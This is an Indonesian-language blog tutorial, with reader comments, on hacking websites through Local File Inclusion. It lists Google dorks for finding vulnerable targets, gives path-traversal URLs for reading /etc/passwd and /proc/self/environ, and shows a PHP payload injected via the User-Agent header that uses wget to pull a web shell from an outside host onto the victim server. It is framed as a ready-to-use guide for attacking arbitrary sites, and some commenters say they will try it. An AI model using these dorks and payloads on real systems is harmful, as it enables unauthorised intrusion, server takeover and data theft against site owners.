Semangat pagi semua, ketemu lagi nih kita. Pada tutorial kali ini saya mau bahas tentang LFI (Local File Inclusion). LFI merupakan teknik hacking yang wajib kita pelajari kalo mau jadi hekel. Kalo saya sih cuma pesbuker jadi kalo gak bisa juga gak dosa, hehe..

Hack website dengan teknik LFI dilakukan dengan cara meng-inject url pada web target yang vuln supaya dapat kita masukan malicious code pada proc/self/environ. Dan akhirnya bisa kita inject untuk mengupload shell ke dalam web target tersebut.

Oke langsung aja kita mulai tutorialnya..

    1. Pertama kita googling dulu target kita pake dork di bawah ini:

      inurl:/view/lang/index.php?page=?page=
      inurl:/shared/help.php?page=
      inurl:act=
      inurl:action=
      inurl:API_HOME_DIR=
      inurl:board=
      inurl:cat=
      inurl:client_id=
      inurl:cmd=
      inurl:cont=
      inurl:current_frame=
      inurl:date=
      inurl:detail=
      inurl:dir=
      inurl:display=
      inurl:download=
      inurl:f=
      inurl:file=
      inurl:fileinclude=
      inurl:filename=
      inurl:firm_id=
      inurl:g=
      inurl:getdata=
      inurl:go=
      inurl:HT=
      inurl:idd=
      inurl:inc=
      inurl:incfile=
      inurl:incl=
      inurl:include_file=
      inurl:include_path=
      inurl:infile=
      inurl:info=
      inurl:ir=
      inurl:lang=
      inurl:language=
      inurl:link=
      inurl:load=
      inurl:main=
      inurl:mainspot=
      inurl:msg=
      inurl:num=
      inurl:openfile=
      inurl:p=
      inurl:page=
      inurl:pagina=
      inurl:path=
      inurl:path_to_calendar=
      inurl:pg=
      inurl:qry_str=
      inurl:ruta=
      inurl:safehtml=
      inurl:section=
      inurl:showfile=
      inurl:side=
      inurl:site_id=
      inurl:skin=
      inurl:static=
      inurl:str=
      inurl:strona=
      inurl:sub=
      inurl:tresc=
      inurl:url=
      inurl:user=
      inurl:ajax.php?page=

    2. Saya asumsikan anda telah mendapat satu target, kemudian kita mulai proses LFI.

      Misalkan target saya memiliki url berikut:

      http://www.website.com/view.php?page=contact.php  

      ( Kita ganti contact.php dengan ../ ) maka url menjadi:

      http://www.website.com/view.php?page=../

    3. Jika Kita medapat pesan error seperti ini:
      Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

      Maka kita bisa lanjut ke langkah ke-4

    4. Sekarang kita inject url dengan memasukan code berikut ini:

      http://www.website.com/view.php?page=../../../etc/passwd

      jika terdapat pesan error seperti ini:

      Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

      maka kita naikan direktorinya menjadi:

      http://www.website.com/view.php?page=../../../../../etc/passwd

      jika berhasil maka akan muncul pesan berikut:

      root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

    5. Sekarang kita cek apakah proc/self/environ dapat kita akses atau tidak, caranya kita ganti url menjadi:

      http://www.website.com/view.php?page=../../../../../proc/self/environ

      jika muncul pesan berikut:

      DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=

      Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80

      itu berarti kita bisa lanjut ..

    6. Nah sekarang kita coba upload shell dengan memasukan malicious code pada url target. Caranya adalah dengan menggunakan addon firefox yaitu tamper data. Saya udah jelasin cara kerjanya di blog ini jadi gak usah tak jelasin lagi ya. Oke kita buka dulu tamper data kemudian klik-start tamper. Kemudian kita buka url berikut:

      http://www.website.com/view.php?page=../../../../../proc/self/environ

      Pada kolom user agen pada tamper data kita masukan code berikut:

      <?system(‘wget http://hack-bay.com/Shells/gny.txt -O shell.php’);?>

      Kemudian klik submit..

    7. Jika berhasil maka kita dapat melihat shell kita pada url:

      http://www.website.com/shell.php

Oke deh selamat mencoba semua🙂

Comments
  1. nn_kript says:

    ow gitu ya, ok deh ane coba dulu

  2. Amazing things here. I am very happy to look your post. Thanks so much and I am taking a look forward to contact you. Will you please drop me a mail?

  3. I am no longer sure the place you are getting your information, but great topic. I must spend a while learning more or understanding more. Thank you for great information I was on the lookout for this info for my mission.

  4. hime-sama says:

    ane pelajari dulu gan, maklum newbie, haha..

  5. kharek.com says:

    Appreciate this post. Will try it out.

  6. masaku11 says:

    gan gimana kalo site URL nya udah disingkat jadi “tes.com/bla-bla.html”

  7. Agpra says:

    gan kok ane pake dork itu gak dapet… bisa di bantu gak? tolong di ajarkan

  8. It’s really a great and helpful piece of info. I’m happy that you just shared this
    useful info with us. Please keep us up to date like this. Thanks for sharing.

Silakan Komentar Jika Kurang Jelas

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s